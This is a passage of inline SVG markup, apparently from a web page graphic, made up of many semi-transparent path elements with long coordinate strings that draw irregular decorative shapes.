d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n          opacity=\"0.2\"></path>\n        <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n          transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n        <path 